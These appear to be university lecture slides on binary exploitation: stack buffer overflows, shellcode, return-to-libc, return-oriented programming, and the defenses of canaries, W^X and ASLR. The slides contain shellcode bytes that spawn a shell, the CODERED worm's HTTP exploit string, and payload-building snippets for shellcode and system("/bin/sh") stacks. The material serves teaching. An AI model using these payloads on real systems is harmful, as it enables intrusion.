1 of 106

Binary Exploitation 1: Buffer Overflows
(return-to-libc, ROP, Canaries, W^X, ASLR)

Chester Rebeiro

Indian Institute of Technology Madras

CR

2 of 106

Parts of Malware

  • Two parts
    • Subvert execution: change the normal execution behavior of the program
    • Payload: the code which the attacker wants to execute


3 of 106

Subvert Execution

  • In application software
    • SQL Injection

  • In system software
    • Buffer overflows and overreads
    • Heap: double free, use after free
    • Integer overflows
    • Format string
    • Control Flow

  • In peripherals
    • USB drives; Printers

  • In Hardware
    • Hardware Trojans

  • Covert Channels
    • Can exist in hardware or software
    • These do not really subvert execution, but can lead to confidentiality attacks.

4 of 106

Buffer Overflows in the Stack

  • We first need to know how the stack is managed

http://insecure.org/stf/smashstack.html

5 of 106

Stack in a Program (when function is executing)

In main:

  push $3
  push $2
  push $1
  call function

In function:

  push %ebp
  movl %esp, %ebp
  sub $20, %esp

Stack (ESP moves down one step after each of the instructions above):

  Parameters for function
  return Address
  prev frame pointer      <- EBP
  Locals of function      <- ESP

%ebp : Frame Pointer
%esp : Stack Pointer

6 of 106

Stack Usage (example)

Stack (top to bottom):

  address              stored data                      region
  1000 to 997          3                                Parameters for function
  996 to 993           2                                Parameters for function
  992 to 989           1                                Parameters for function
  988 to 985           return address                   Return Address
  984 to 981           %ebp (stored frame pointer)      prev frame pointer
  (%ebp) 980 to 976    buffer1                          Locals of function (frame pointer)
  975 to 966           buffer2                          Locals of function
  (%sp) 964                                             stack pointer

7 of 106

Stack Usage Contd.

Stack (top to bottom):

  address              stored data
  1000 to 997          3
  996 to 993           2
  992 to 989           1
  988 to 985           return address
  984 to 981           %ebp (stored frame pointer)
  (%ebp) 980 to 976    buffer1
  975 to 966           buffer2
  (%sp) 964

What is the output of the following?

  • printf("%x", buffer2) : 966
  • printf("%x", &buffer2[10]) : 976 → buffer1

Therefore buffer2[10] is the same memory location as buffer1[0]

A BUFFER OVERFLOW
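The address arithmetic behind this result can be checked with a small model. This is a minimal sketch in Python rather than the C program from the slide; it assumes the decimal addresses of the table and one byte per buffer element, and the names `element_address` and `owner` are illustrative only.

```python
# Toy model of the slide's stack layout (addresses are the slide's decimal values).
BUFFER2_BASE, BUFFER2_LEN = 966, 10   # buffer2 occupies 966..975
BUFFER1_BASE, BUFFER1_LEN = 976, 5    # buffer1 occupies 976..980


def element_address(base: int, index: int, elem_size: int = 1) -> int:
    """Address of base[index]; C performs no bounds check on the index."""
    return base + index * elem_size


def owner(address: int) -> str:
    """Name the object that actually lives at an address."""
    if BUFFER2_BASE <= address < BUFFER2_BASE + BUFFER2_LEN:
        return "buffer2"
    if BUFFER1_BASE <= address < BUFFER1_BASE + BUFFER1_LEN:
        return "buffer1"
    return "other"


addr = element_address(BUFFER2_BASE, 10)
print(addr, owner(addr))
```

Index 10 is one past the last valid element of buffer2, so the computed address already belongs to buffer1.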


8 of 106

Modifying the Return Address

buffer2[19] = &arbitrary memory location

buffer2 starts at 966, so buffer2[19] is at address 966 + 19 = 985, the first byte of the stored return address. Overwriting it causes execution of an arbitrary memory location instead of the standard return.

Stack (top to bottom):

  address              stored data
  1000 to 997          3
  996 to 993           2
  992 to 989           1
  988 to 985           Return Address, replaced by the Arbitrary Location (offset 19 from buffer2)
  984 to 981           %ebp (stored frame pointer)
  (%ebp) 980 to 976    buffer1
  975 to 966           buffer2
  (%sp) 964
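The overwrite can be simulated on a byte array. This is a sketch under stated assumptions: memory is modelled as a Python `bytearray` indexed by the slide's decimal addresses, and both the original return address `0x08048abc` and the replacement `0xdeadbeef` are made-up values.

```python
import struct

memory = bytearray(1001)    # index == address, to match the slide's table

BUFFER2 = 966               # start of buffer2
RET_ADDR_SLOT = 985         # lowest byte of the 4-byte return address (985..988)


def write_bytes(base: int, offset: int, data: bytes) -> None:
    """Unchecked write, like C array indexing past the end of a buffer."""
    memory[base + offset: base + offset + len(data)] = data


def read_return_address() -> int:
    return struct.unpack_from("<I", memory, RET_ADDR_SLOT)[0]


# Legitimate return address stored by `call` (hypothetical value).
struct.pack_into("<I", memory, RET_ADDR_SLOT, 0x08048ABC)

# Writing 4 bytes starting at buffer2[19] lands exactly on the return address.
write_bytes(BUFFER2, 19, struct.pack("<I", 0xDEADBEEF))
print(hex(read_return_address()))
```

When the function later executes `ret`, the value read from this slot is what ends up in EIP.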


9 of 106

Now that we have seen how a buffer overflow can change where a function returns (for example, to skip an instruction), we will see how an attacker can use it to execute their own code (exploit code)

Stack (top to bottom):

  address              stored data
  1000 to 997          3
  996 to 993           2
  992 to 989           1
  988 to 985           ATTACKER'S code pointer
  984 to 981           %ebp (stored frame pointer)
  (%ebp) 980 to 976    buffer1
  975 to 966           buffer2
  (%sp) 964

10 of 106

Big Picture of the exploit

Fill the stack as follows (where BA is the buffer address):

  region                                  contents after the overflow
  Parameters for function                 BA
  Return Address                          BA
  prev frame pointer (frame pointer)      BA
  buffer (upper part)                     BA BA BA ...
  buffer (starts at buffer address BA)    Exploit code        <- stack pointer

11 of 106

Payload

  • Let's say the attacker wants to spawn a shell
  • i.e. do as follows:

  • How does the attacker put this code onto the stack?

12 of 106

Step 1 : Get machine codes

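  • objdump --disassemble-all shellcode.o
  • Get machine code : "eb 1e 5e 89 76 08 c6 46 07 00 c7 46 0c 00 00 00 00 b8 0b 00 00 00 89 f3 8d 4e 08 8d 56 0c cd 80 cd 80"
  • If there are 00 bytes, replace those instructions with other instructions that do the same work without zero bytes (a string copy such as strcpy stops at the first 00)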
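A quick way to see why the 00 bytes matter is to locate them and to compute how much of the code a string copy would transfer. The sketch below uses the machine code quoted above; the helper names are illustrative.

```python
SHELLCODE_HEX = (
    "eb 1e 5e 89 76 08 c6 46 07 00 c7 46 0c 00 00 00 00 "
    "b8 0b 00 00 00 89 f3 8d 4e 08 8d 56 0c cd 80 cd 80"
)


def zero_byte_offsets(code: bytes) -> list[int]:
    """Offsets of all 00 bytes in the machine code."""
    return [i for i, b in enumerate(code) if b == 0]


def bytes_copied_by_strcpy(code: bytes) -> int:
    """strcpy stops at the first zero byte (the C string terminator)."""
    end = code.find(b"\x00")
    return len(code) if end == -1 else end


shellcode = bytes.fromhex(SHELLCODE_HEX)
print(len(shellcode), zero_byte_offsets(shellcode), bytes_copied_by_strcpy(shellcode))
```

Only the bytes before the first zero would reach the target buffer, which is why the zero-producing instructions have to be rewritten first.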


13 of 106

Step 2: Find Buffer overflow in an application

(Code listing of the vulnerable application; callout: the buffer that overflows is defined on the stack)

14 of 106

Step 3: Put Machine Code in Large String

  large_string: [ shellcode | (rest of large_string) ]

15 of 106

Step 3 (contd): Fill up Large String with BA

  large_string: [ shellcode | BA | BA | BA | BA | BA | BA | BA | BA ]

Address of buffer is BA
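The layout of large_string can be sketched as follows. The assumptions are mine, not the slide's: a 32-bit little-endian target, a word-aligned buffer, a placeholder `shellcode` of 0xcc bytes, and a made-up buffer address `0xbffff6c4` chosen to contain no zero bytes.

```python
import struct


def build_large_string(shellcode: bytes, buffer_address: int, total_len: int) -> bytes:
    """Shellcode first, then the buffer address (BA) repeated up to total_len bytes."""
    # Pad with NOPs (0x90) to a multiple of 4 so every BA copy stays word-aligned.
    padded = shellcode + b"\x90" * (-len(shellcode) % 4)
    if total_len % 4 or len(padded) > total_len:
        raise ValueError("total_len must be a multiple of 4 and hold the shellcode")
    ba = struct.pack("<I", buffer_address)           # 32-bit little-endian
    return padded + ba * ((total_len - len(padded)) // 4)


placeholder_shellcode = b"\xcc" * 6                  # stands in for the real machine code
large_string = build_large_string(placeholder_shellcode, 0xBFFFF6C4, 128)
print(len(large_string), large_string[-4:].hex())
```

Repeating BA many times means the attacker does not need to know the exact distance from the buffer to the return address, only that one of the copies lands on it.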


16 of 106

Final state of Stack

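  • Copy large string into buffer
  • When the function that called strcpy returns, the exploit code would be executed

  large_string:         [ shellcode | BA | BA | BA | BA | BA | BA | BA | BA ]
  buffer (on stack):    [ shellcode | BA | BA | BA | ... ]   starting at the buffer address BA
  beyond the buffer:    BA copies overwrite the prev frame pointer and the return address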

17 of 106

Putting it all together

bash$ gcc overflow1.c
bash$ ./a.out
$sh

18 of 106

Buffer overflow in the Wild

  • Worm CODERED … released on 13th July 2001
  • Infected 359,000 computers by 19th July.

19 of 106

CODERED Worm

  • Targeted a bug in Microsoft’s IIS web server
  • CODERED’s string


GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0


20 of 106

Defenses

  • Eliminate program flaws that could lead to subverting of execution
    • Safer programming languages; safer libraries; hardware enhancements; static analysis
  • If flaws can't be eliminated, make it more difficult for malware to subvert execution
    • W^X, ASLR, canaries
  • If malware still manages to execute, try to detect its execution at runtime
    • Malware run-time detection techniques using learning techniques (ANN) and malware signatures
  • If it can't be detected at runtime, try to restrict what the malware can do
    • Sandbox the system so that malware affects only part of the system; access control; virtualization; TrustZone; SGX
    • Track information flow
      • DIFT; ensure malware does not steal sensitive information

21 of 106

Preventing Buffer Overflows with Canaries and W^X

22 of 106

Canaries

Stack (top to bottom):

  stored data
  3
  2
  1
  ret addr
  sfp (%ebp)
  canary          <- insert a canary here
  buffer1
  buffer2

Before the function returns, check if the canary value has been modified.

  • Known (pseudo random) values placed on stack to monitor buffer overflows.
  • A change in the value of the canary indicates a buffer overflow.
  • A modified canary causes 'stack smashing' to be detected
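The check can be illustrated with a toy frame. This is a simulation in Python, not what gcc emits; the frame layout (buffer, then canary, then return address), the sizes, and the class name `Frame` are assumptions made for the sketch.

```python
import secrets

BUF_LEN, CANARY_LEN = 16, 4


class Frame:
    """Toy stack frame: [ buffer | canary | saved return address ], low to high."""

    def __init__(self, return_address: bytes, canary: bytes = b""):
        # Reference copy of the canary, kept outside the frame.
        self.canary = canary or secrets.token_bytes(CANARY_LEN)
        self.mem = bytearray(BUF_LEN) + bytearray(self.canary) + bytearray(return_address)

    def unchecked_copy(self, data: bytes) -> None:
        """Like strcpy into the buffer: no bounds check (clamped to the frame only)."""
        n = min(len(data), len(self.mem))
        self.mem[:n] = data[:n]

    def canary_intact(self) -> bool:
        """The comparison performed just before the function returns."""
        return bytes(self.mem[BUF_LEN:BUF_LEN + CANARY_LEN]) == self.canary


frame = Frame(b"\x10\x20\x30\x40")
frame.unchecked_copy(b"A" * 8)       # stays inside the buffer
print(frame.canary_intact())
frame.unchecked_copy(b"A" * 24)      # runs over the canary and the return address
print(frame.canary_intact())
```

Because the canary sits between the buffer and the return address, a contiguous overflow cannot reach the return address without changing the canary first.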


23 of 106

Canaries and gcc

  • As of gcc 4.4.5, canaries are not added to functions by default
    • They could cause overheads, as the check is executed on every call of a protected function
  • Canaries can be added to the code with the -fstack-protector option
    • If -fstack-protector is specified, canaries will get added based on a gcc heuristic
      • For example, a buffer of at least 8 bytes is allocated
      • Use of string operations such as strcpy, scanf, etc.

  • Canaries can be evaded quite easily by an exploit that does not alter the contents of the canary

24 of 106

Canaries Example

Without canaries, the return address on the stack gets overwritten, resulting in a segmentation fault. With canaries, the program is aborted as soon as stack smashing is detected.


26 of 106

Canary Internals

Assembly listings compared: without canaries and with canaries. The version with canaries adds two steps:

  • Store canary onto stack
  • Verify if the canary has changed

gs is a segment register used to address thread-local data; in this case it is used for picking out the canary value

27 of 106

Non Executable Stacks (W^X)

  • In Intel/AMD processors, an NX/XD bit is present to mark non-code regions as non-executable.
    • Exception raised when code in a page marked non-executable is executed
  • Works for most programs
    • Supported by the Linux kernel from 2004
    • Supported by Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1
      • Called DEP – Data Execution Prevention
  • Does not work for some programs that NEED to execute from the stack.
    • E.g. a JIT compiler, which constructs assembly code from external data and then executes it. (W^X needs to be disabled to get this to work)

28 of 106

Will a non-executable stack prevent buffer overflow attacks?

Return-to-libc Attacks

(Bypassing non-executable stack during exploitation using return-to-libc attacks)

https://css.csail.mit.edu/6.858/2010/readings/return-to-libc.pdf

29 of 106

Return to Libc (big picture)

  buffer:            [ Exploit code | BA | BA | BA | BA | BA | BA | BA ]
  Return Address:    BA

This will not work if the NX bit is set

30 of 106

Return to Libc (replace return address to point to a function within libc)

  buffer:            [ F1 Addr | F1 Addr | F1 Addr | F1 Addr | ... ]
  Return Address:    F1 Addr

  Process memory: Stack, Heap, Data, Text (F1 lives in Text)

Bypasses W^X since F1 is in the code segment and can be legally executed.

31 of 106

F1 = system()

  • One option is the function system, present in libc

system("/bin/sh");

would create a shell

(there could be other options as well)

So we need to

  1. Find the address of system in the program (it does not have to be a user specified function; it could be a function present in one of the linked libraries)
  2. Supply an address that points to the string /bin/sh

32 of 106

The return-to-libc attack

  buffer:                  [ F1ptr | F1ptr | F1ptr | F1ptr | ... ]
  Return Address:          F1ptr       → system() in libc
  above return address:    Shell ptr   → the string /bin/sh

33 of 106

Find address of system in the executable


34 of 106

Find address of /bin/sh

  • Every process stores the environment variables at the bottom of the stack
  • We need to find this and extract the string /bin/sh from it

35 of 106

Finding the address of the string /bin/sh

36 of 106

The final Exploit Stack

  region                   contents
  buffer                   xxx xxx xxx ...
  Return Address           0x28085260    → system() in libc
  above return address     dead          (dummy return address for system())
  above that               0xbfbffe25    → the string /bin/sh

37 of 106

A clean exit

  region                   contents
  buffer                   xxx xxx xxx ...
  Return Address           0x28085260    → system() in libc
  above return address     0x281130d0    → exit() in libc (system() returns here)
  above that               0xbfbffe25    → the string /bin/sh
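The final stack contents can be assembled as a byte string. A minimal sketch, assuming a 32-bit little-endian target and using the three addresses shown on the slide; the distance from the start of the buffer to the return address (`offset_to_ret`, 24 here) is a hypothetical value that depends on the victim program.

```python
import struct

SYSTEM_ADDR = 0x28085260   # system() in libc (value shown on the slide)
EXIT_ADDR = 0x281130D0     # exit() in libc (value shown on the slide)
BINSH_ADDR = 0xBFBFFE25    # address of the string /bin/sh (value shown on the slide)


def ret2libc_payload(offset_to_ret: int) -> bytes:
    """padding | &system | &exit (return address of system) | &"/bin/sh" (argument)."""
    padding = b"x" * offset_to_ret
    return padding + struct.pack("<III", SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR)


payload = ret2libc_payload(24)
print(payload[24:].hex())
```

The word after the address of system() is where system() expects its own return address, so placing exit() there gives the clean exit, and the word after that is read as the first argument.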


38 of 106

Limitation of ret2libc

  • Limitation on what the attacker can do (restricted to the functions available in the library)
  • These functions could be removed from the library

39 of 106

Return Oriented Programming (ROP)

40 of 106

Push and ESP

push %EDX

  1. Decrement ESP by 4 bytes
  2. Copy EDX onto the stack, at the location SS:ESP now points to

(Figure: stack segment SS, with ESP marking the top of the stack)

41 of 106

Call and ESP

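call Address

  1. Change EIP to the next instruction (the instruction after the call)
  2. Decrement ESP by 4 bytes
  3. Copy EIP onto the stack (this is the return address)
  4. Load Address into EIP, so that execution continues in the called function

(Figure: stack segment SS, with ESP marking the top of the stack)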

42 of 106

Pop and ESP

pop %EDX

  1. Copy the contents at the top of the stack to the EDX register
  2. Increment ESP by 4 bytes

(Figure: stack segment SS, with ESP marking the top of the stack)

43 of 106

Ret and ESP

ret

  1. Copy the contents at the top of the stack (the return address) to the EIP register
  2. Increment ESP by 4 bytes
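The effect of push, call, pop and ret on ESP can be followed in a small simulator. This is a sketch, not an emulator: it models only ESP, EIP, EDX and a 64-byte stack, the class name `Cpu` is illustrative, and the 5-byte call length assumes the common `call rel32` encoding.

```python
import struct


class Cpu:
    """Just enough 32-bit state to show how push, pop, call and ret move ESP."""

    def __init__(self, stack_size: int = 64):
        self.mem = bytearray(stack_size)
        self.esp = stack_size          # empty stack: ESP just past the highest slot
        self.eip = 0
        self.edx = 0

    def _store(self, value: int) -> None:
        self.esp -= 4                                   # decrement first ...
        struct.pack_into("<I", self.mem, self.esp, value)  # ... then write

    def _load(self) -> int:
        value = struct.unpack_from("<I", self.mem, self.esp)[0]  # read first ...
        self.esp += 4                                            # ... then increment
        return value

    def push_edx(self) -> None:
        self._store(self.edx)

    def pop_edx(self) -> None:
        self.edx = self._load()

    def call(self, target: int, insn_len: int = 5) -> None:
        self._store(self.eip + insn_len)   # return address = instruction after the call
        self.eip = target

    def ret(self) -> None:
        self.eip = self._load()


cpu = Cpu()
cpu.eip, cpu.edx = 0x1000, 0xDEADBEEF
cpu.push_edx()
cpu.call(0x2000)
cpu.ret()
print(hex(cpu.eip), cpu.esp)
```

Note that `ret` simply trusts whatever word ESP points to, which is the property that return-oriented programming builds on.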


44 of 106

Return Oriented Programming Attacks

  • Introduced by Hovav Shacham (ACM CCS 2007)
  • Subverts execution to libc
    • As with the regular ret-2-libc, it can be used with non-executable stacks since the instructions can be legally executed
    • Unlike ret-2-libc, it does not need to execute whole functions in libc (it can perform arbitrary computation)

The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)

45 of 106

Target Payload

Let's say this is the payload the attacker needs to execute.

Suppose there is a function in libc which has exactly this sequence of instructions. Then we are done: we just need to subvert execution to that function.

What if such a function does not exist? If you can't find it, then build it.

46 of 106

Step 1: Find Gadgets

  • Find gadgets
  • A gadget is a short sequence of instructions followed by a return

      useful instruction(s)
      ret

  • Useful instructions : should not transfer control outside the gadget
  • This is a pre-processing step, done by statically analyzing the libc library

47 of 106

Step 2: Stitching

  • Stitch gadgets so that the payload is built

Program Binary

  G1:  movl %esi, 0x8(%esi)
       ret
  G2:  movb $0x0, 0x7(%esi)
       ret
  G3:  movb $0x0, 0xc(%esi)
       ret
  G4:  movl $0xb, %eax
       ret

Ret instruction has 2 steps:

  • Pops the contents pointed to by ESP into EIP
  • Increments ESP by 4 (32-bit machine)

48 of 106

Step 3: Construct the Stack

Program Stack

  region                   contents
  buffer                   xxx xxx xxx ...
  Return Address           AG1
  above return address     AG2
                           AG3
                           AG4

AGi: Address of Gadget i

Program Binary

  G1:  movl %esi, 0x8(%esi)
       ret
  G2:  movb $0x0, 0x7(%esi)
       ret
  G3:  movb $0x0, 0xc(%esi)
       ret
  G4:  movl $0xb, %eax
       ret

49 of 106

Finding Gadgets

  • Static analysis of libc
  • To find
    1. A set of instructions that ends in a ret (0xc3). The instructions can be intended (put in by the compiler) or unintended
    2. Besides ret, none of the instructions transfer control out of the gadget

50 of 106

Intended vs Unintended Instructions

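  • Intended : machine code intentionally put in by the compiler
  • Unintended : interpret machine code differently in order to build new instructions

Machine Code : F7 C7 07 00 00 00 0F 95 45 C3

What the compiler intended (decoding from the first byte):

  f7 c7 07 00 00 00    test $0x00000007, %edi
  0f 95 45 c3          setnz -61(%ebp)

What was not intended (decoding from the second byte):

  c7 07 00 00 00 0f    movl $0x0f000000, (%edi)
  95                   xchg %ebp, %eax
  45                   inc %ebp
  c3                   ret

Highly likely to find many diverse instructions of this form in x86; not so likely to have such diverse instructions in RISC processors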

51 of 106

Geometry

  • Given an arbitrary string of machine code, what is the probability that the code can be interpreted as useful instructions?
    • x86 code is highly dense
    • RISC processors (SPARC, ARM, etc.) have low geometry
  • Thus finding gadgets in x86 code is considerably easier than in ARM or SPARC code
  • A fixed-length instruction set reduces geometry

52 of 106

Finding Gadgets

  • Static analysis of libc
  • Find any memory location with 0xc3 (RETurn instruction)
  • Build a trie data structure with 0xc3 as the root
  • Every path (starting from any node, not just a leaf) to the root is a possible gadget

(Figure: trie rooted at C3, with nodes 00, 24, 37, 24, 46, 43, 16, 89, 94; an edge means "child of")

53 of 106

Finding Gadgets

  • Scan libc from the beginning toward the end
  • If 0xc3 is found
    • Start scanning backward
    • With each byte, ask whether the subsequence forms a valid instruction
    • If yes, add it as a child
    • If no, keep going backward until we reach the maximum instruction length (20 bytes)
    • Repeat this up to a predefined length W, which is the maximum number of instructions in the gadget
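The backward scan can be sketched as a flat enumeration of byte windows that end in 0xc3. This is a simplification, not the trie-building algorithm itself: deciding whether a window decodes to valid instructions needs an x86 decoder, so the sketch takes a caller-supplied `is_valid` predicate (hypothetical, accepting everything by default) and limits windows by bytes (`max_len`) rather than by instruction count. The sample bytes are the machine code string from the intended vs unintended slide.

```python
from typing import Callable, Iterator

RET = 0xC3


def candidate_gadgets(
    code: bytes,
    max_len: int = 8,
    is_valid: Callable[[bytes], bool] = lambda seq: True,
) -> Iterator[tuple[int, bytes]]:
    """Yield (offset, window) for every byte window that ends in a ret (0xc3)."""
    for end, byte in enumerate(code):           # scan forward for ret bytes
        if byte != RET:
            continue
        # Scan backward from the ret, growing the window one byte at a time.
        for start in range(end - 1, max(end - max_len, 0) - 1, -1):
            window = code[start:end + 1]
            if is_valid(window):
                yield start, window


sample = bytes.fromhex("f7c7070000000f9545c3")
for offset, window in candidate_gadgets(sample):
    print(offset, window.hex())
```

The window starting at offset 1 is the unintended `movl; xchg; inc; ret` sequence, which a real decoder-backed `is_valid` would accept.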

Example byte stream: 33 b2 23 12 a0 31 a5 67 22 ab ba 4a 3c c3 ff ee ab 31 11 09

54 of 106

Finding Gadgets Algorithm


55 of 106

Finding Gadgets Algorithm

Annotations on the algorithm:

  • Is this sequence of bytes a valid x86 instruction?
  • Boring: not interesting to look further
    • E.g. pop %ebp; ret and leave; ret (these are boring if we want to ignore intended instructions)
    • Instructions that jump out of the gadget
  • Found 15,121 nodes in ~1MB of libc binary

56 of 106

More about Gadgets

  • Example Gadgets
    • Loading a constant into a register (edx ← deadbeef)

  Gadget:   pop %edx
            ret

  stack:    GadgetAddr      <- esp
            deadbeef

  • A previous return will pop the gadget address into %eip
  • %esp will also be incremented to point to deadbeef (4 bytes on a 32-bit platform)
  • The pop %edx will pop deadbeef from the stack into %edx and increment %esp to point to the next 4 bytes on the stack

57 of 106

Stitch

  G1:  pop %edx
       ret
  G2:  mov 64(%edx), %eax
       ret

  stack:    G1        <- esp
            addr
            G2

  memory at addr+64:  deadbeef

Load arbitrary data into the eax register using gadgets G1 and G2
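How the two gadgets cooperate can be traced with a tiny interpreter. This is a model only: gadgets are represented as lists of operation names instead of machine code, the stack is a list of 32-bit words, and the gadget addresses `0x1000` and `0x2000` and the data address `0x5000` are made up.

```python
def run_chain(stack_words: list[int], memory: dict[int, int],
              gadgets: dict[int, list[str]]) -> dict[str, int]:
    """Interpret a ROP chain; stack_words is the attacker-controlled stack."""
    regs = {"eax": 0, "edx": 0}
    sp = 0                                    # index into stack_words (ESP / 4)

    def pop() -> int:
        nonlocal sp
        word = stack_words[sp]
        sp += 1
        return word

    eip = pop()                               # the victim's ret pops the first gadget address
    while eip in gadgets:
        for op in gadgets[eip]:
            if op == "pop edx":
                regs["edx"] = pop()
            elif op == "mov 64(edx), eax":
                regs["eax"] = memory[regs["edx"] + 64]
        # Every gadget ends in ret, which pops the next gadget address.
        eip = pop() if sp < len(stack_words) else None
    return regs


G1, G2, ADDR = 0x1000, 0x2000, 0x5000
gadgets = {G1: ["pop edx"], G2: ["mov 64(edx), eax"]}
memory = {ADDR + 64: 0xDEADBEEF}
regs = run_chain([G1, ADDR, G2], memory, gadgets)
print(hex(regs["edx"]), hex(regs["eax"]))
```

The stack interleaves code pointers (G1, G2) with data (addr): each `pop` consumes data, each `ret` consumes the next code pointer.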


58 of 106

Store Gadget

  • Store the contents of a register to a memory location in the stack

  Gadget 1:  pop %edx
             ret
  Gadget 2:  mov %eax, 24(%edx)
             ret

  stack:    GadgetAddr 1    <- esp
            0
            GadgetAddr 2

  The store lands 24 bytes above the address held in %edx

59 of 106

Gadget for addition

  addl (%edx), %eax
  inc %esp
  mov %edi, (%esp)
  ret

  • addl (%edx), %eax : add the memory pointed to by %edx to %eax. The result is stored in %eax
  • inc %esp; mov %edi, (%esp) : why is this present? It is unnecessary, but this is the best gadget that we can find for addition
    • It modifies the stack, which holds the gadget addresses (GadgetAddr, GadgetAddr2), so it can create problems!
    • We need workarounds!

60 of 106

Gadget for addition (put 0xc3 into %edi)

  Gadget 1:  pop %edi
             ret
  Gadget 2:  addl (%edx), %eax
             inc %esp
             mov %edi, (%esp)
             ret

  stack:    GadgetAddr1     <- esp
            Gadget_RET      → 0xc3
            GadgetAddr2
            Gadget_RET
            GadgetAddr3

  1. First put the gadget pointer for 0xC3 (Gadget_RET) into %edi
  2. 0xC3 is ret; in ROP, ret is equivalent to a NOP
  3. The push of %edi in gadget 2 just pushes the pointer to 0xc3 back onto the stack, therefore not disturbing the stack contents
  4. Gadget 3 executes as planned

61 of 106

Unconditional Branch in ROP

  • Changing %esp causes unconditional jumps

  Gadget:   pop %esp
            ret

  stack:    GA              <- esp
            (new value for %esp)

62 of 106

Conditional Branches

In x86, a conditional branch has 2 parts

  1. An instruction which modifies a condition flag (e.g. CF, OF, ZF)
     e.g. CMP %eax, %ebx (will set ZF if %eax = %ebx)
  2. A branch instruction (e.g. JZ, JNZ or another Jcc), which internally checks the condition flag and changes EIP accordingly

In ROP, a conditional branch has 3 parts

  1. A gadget which modifies a condition flag (e.g. CF, OF, ZF)
     e.g. CMP %eax, %ebx (will set ZF if %eax = %ebx)
  2. Transfer the flags to a register or memory
  3. Perturb %esp based on the flags stored in memory

In ROP, the flags need to modify the %esp register instead of EIP. This needs to be handled explicitly.

63 of 106

Step 1 : Set the flags

Find suitable gadgets that set the appropriate flags

  • CMP %eax, %ebx
    RET
    • Subtraction (the result is discarded)
    • Affects flags CF, OF, SF, ZF, AF, PF
  • NEG %eax
    RET
    • 2's complement negation
    • Affects CF (CF is set unless %eax was 0)

64 of 106

Step 2: Transfer flags to memory or register

  • Using the lahf instruction: stores 5 flags (ZF, SF, AF, PF, CF) in the %ah register
  • Using the pushf instruction: pushes the eflags onto the stack (where would one use this instruction?)

Gadgets for these two are not easily found.

A third way: perform an operation whose result depends on the flag contents.

65 of 106

Step 2: Indirect way to transfer flags to memory

Several instructions operate using the contents of the flags

  • ADC %eax, %ebx : add with carry; performs ebx <- ebx + eax + CF (in AT&T operand order the destination is the second operand)
    (if eax and ebx are 0 initially, then the result will be either 1 or 0 depending on the CF)
  • RCL : rotate left through carry, e.g. RCL $1, %eax
    (if eax = 0, then the result is either 0 or 1 depending on CF)
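Both instructions can be modelled on 32-bit integers to confirm that, with zeroed operands, the result is exactly the carry flag. The function names `adc` and `rcl1` are illustrative; each returns the 32-bit result together with the new CF.

```python
MASK32 = 0xFFFFFFFF


def adc(dst: int, src: int, cf: int) -> tuple[int, int]:
    """Add with carry: returns ((dst + src + CF) mod 2**32, new CF)."""
    total = dst + src + cf
    return total & MASK32, total >> 32


def rcl1(value: int, cf: int) -> tuple[int, int]:
    """Rotate left by one through carry: CF enters bit 0, bit 31 leaves into CF."""
    return ((value << 1) | cf) & MASK32, (value >> 31) & 1


for cf in (0, 1):
    print(cf, adc(0, 0, cf)[0], rcl1(0, cf)[0])
```

Either gadget therefore turns the one-bit flag into an ordinary register value that later gadgets can store or combine.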


66 of 106

Gadget to transfer flags to memory

Annotations on the gadget listing:

  • %edx will have the value A (the address of the memory location that receives the flag)
  • %ecx will contain 0x0

67 of 106

Step 3: Perturb %esp depending on flag

What we hope to achieve

  If (CF is set) {
      perturb %esp
  } else {
      leave %esp as it is
  }

What we have

  • CF stored in a memory location (say X)
  • Current %esp
  • delta, how much to perturb %esp

One way of achieving this

  negate X
  offset = delta & X
  %esp = %esp + offset

  1. Negate X (e.g. using the instruction negl), which finds the 2's complement of X
     if X = 1, the 2's complement is 111111111…
     if X = 0, the 2's complement is 000000000…
  2. offset = delta if X = 1
     offset = 0 if X = 0
  3. %esp = %esp + offset if X = 1
     %esp = %esp if X = 0
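The three steps amount to a branch-free select, which can be checked on 32-bit integers. A minimal sketch; the function name and the sample %esp value `0xbffff000` are assumptions.

```python
MASK32 = 0xFFFFFFFF


def conditional_esp(esp: int, delta: int, x: int) -> int:
    """esp + delta if x == 1, esp unchanged if x == 0, without any branch."""
    mask = (-x) & MASK32          # negl: 1 -> 0xFFFFFFFF, 0 -> 0x00000000
    offset = delta & mask         # delta or 0
    return (esp + offset) & MASK32


print(hex(conditional_esp(0xBFFFF000, 16, 1)))
print(hex(conditional_esp(0xBFFFF000, 16, 0)))
```

A backward jump works the same way, with delta given as a 32-bit two's complement value.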


68 of 106

Turing Complete

  • Gadgets can do much more: invoke libc functions, invoke system calls, ...
  • For x86, gadgets are said to be Turing complete
    • Can program just about anything with gadgets
  • For RISC processors, it is more difficult to find gadgets
    • Instructions are fixed width
    • Therefore can't find unintended instructions
  • Tools are available to find gadgets automatically
    • E.g. ROPgadget (https://github.com/JonathanSalwan/ROPgadget)
    • Ropper (https://github.com/sashs/Ropper)

69 of 106

Address Space Layout Randomization (ASLR)

70 of 106

The Attacker’s Plan

  • Find a bug in the source code (e.g. of the kernel) that can be exploited
    • Eyeballing
    • Noticing something in the patches
    • Following CVEs
  • Use that bug to insert malicious code to perform something nefarious
    • Such as getting root privileges in the kernel

The attacker depends upon knowing where these functions reside in memory, and assumes that many systems use the same address mapping. Therefore one exploit may spread easily.

71 of 106

Address Space Randomization

  • Address space layout randomization (ASLR) randomizes the address space layout of the process
  • Each execution would have a different memory map, thus making it difficult for the attacker to run exploits
  • Initiated by the Linux PaX project in 2001
  • Now a default in many operating systems

(Figure: memory layout across boots for a Windows box)

72 of 106

ASLR in the Linux Kernel

  • Locations of the base, libraries, heap, and stack can be randomized in a process' address space

  • Built into the Linux kernel and controlled by /proc/sys/kernel/randomize_va_space

  • randomize_va_space can take 3 values
    • 0 : disable ASLR
    • 1 : positions of stack, VDSO, shared memory regions are randomized; the data segment is immediately after the executable code
